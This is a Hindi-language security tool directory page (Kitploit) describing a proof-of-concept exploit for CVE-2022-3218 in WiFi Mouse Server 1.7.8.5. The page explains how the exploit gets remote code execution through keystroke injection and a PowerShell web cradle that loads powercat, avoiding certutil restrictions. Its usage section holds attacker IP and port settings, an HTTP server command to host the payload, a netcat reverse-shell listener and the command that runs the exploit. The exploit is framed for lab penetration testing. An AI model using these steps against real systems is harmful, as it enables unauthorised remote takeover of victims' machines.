Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mermehr/mouseserver-1.7.8.5-rce
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubmermehr/mouseserver-1.7.8.5-rce

MouseServer-1.7.8.5-RCE

WiFi Mouse Server 1.7.8.5 को लक्षित करने वाला CVE-2022-3218 के लिए PoC एक्सप्लॉइट, जो हार्डन्ड लैब्स के लिए कीस्ट्रोक इंजेक्शन और इन-मेमोरी PowerShell पेलोड डिलीवरी के माध्यम से RCE प्राप्त करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
5 दिन पहलेअभी तक समीक्षित नहीं

WiFi Mouse Server 1.7.8.5 - RCE

WiFi Mouse Server v1.7.8.5 के लिए एक अनुकूलित Python 3 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट। यह स्क्रिप्ट स्वचालित कीस्ट्रोक इंजेक्शन के माध्यम से रिमोट कोड निष्पादन (RCE) प्राप्त करने के लिए एक अंतर्निहित प्रोटोकॉल भेद्यता का लाभ उठाती है।

यह संस्करण विशेष रूप से लैब वातावरण के लिए संशोधित और अनुकूलित किया गया है, जहाँ पारंपरिक सार्वजनिक एक्सप्लॉइट्स होस्ट-हार्डनिंग बाधाओं (जैसे प्रतिबंधित certutil.exe निष्पादन या बाइनरी डाउनलोड अवरोधन) के कारण विफल हो जाते हैं।

संदर्भ और श्रेय

  • ऐतिहासिक रूप से CVE-2022-3218 जैसे सामुदायिक निष्कर्षों के साथ ट्रैक किया गया।
  • RedHatAugust के मूल सार्वजनिक एक्सप्लॉइट से अत्यधिक प्रेरित और अनुकूलित, Exploit-DB #49601।
  • मूल Exploit-DB स्क्रिप्ट एक दुर्भावनापूर्ण निष्पादन योग्य फ़ाइल को डिस्क पर डालने के लिए cmd.exe और certutil.exe पर निर्भर करती है। हार्डन किए गए या आधुनिक परीक्षा/लैब संरचनाओं में, ये LOLBins अक्सर स्थानीय समूह नीतियों द्वारा प्रतिबंधित या अवरुद्ध होते हैं। यह संशोधित संस्करण वेक्टर को पूरी तरह से powercat.ps1 का उपयोग करके PowerShell वेब क्रेडल के माध्यम से मेमोरी में स्थानांतरित कर देता है।

उपयोग

अपना पेलोड कॉन्फ़िगर करें (स्क्रिप्ट के अंदर)

स्क्रिप्ट खोलें और फ़ाइल के शीर्ष पर स्थित कॉन्फ़िगरेशन वेरिएबल्स को अपनी स्थानीय वातावरण सेटिंग्स के साथ अपडेट करें:

root@kitploit:~
rhost = sys.argv[1]
lhost = "192.168.45.167"  # Your Attacker/Kali IP
lport = "443"             # Your Netcat Listener Port
http_port = "80"          # Your local HTTP Server Port hosting powercat

होस्ट लिसनर सेट अप करें

अपनी स्थानीय हमलावर मशीन पर एक निर्देशिका में powercat.ps1 होस्ट करें:

root@kitploit:~
python3 -m http.server 80

एक अलग टर्मिनल टैब में, कॉन्फ़िगर किए गए lport पर अपना रिवर्स शेल लिसनर स्थापित करें:

root@kitploit:~
nc -lvnp 443

एक्सप्लॉइट ट्रिगर करें

लक्ष्य मशीन के IP पते के विरुद्ध स्क्रिप्ट निष्पादित करें:

root@kitploit:~
python3 exploit.py <TARGET-IP>
टूल डाउनलोड करें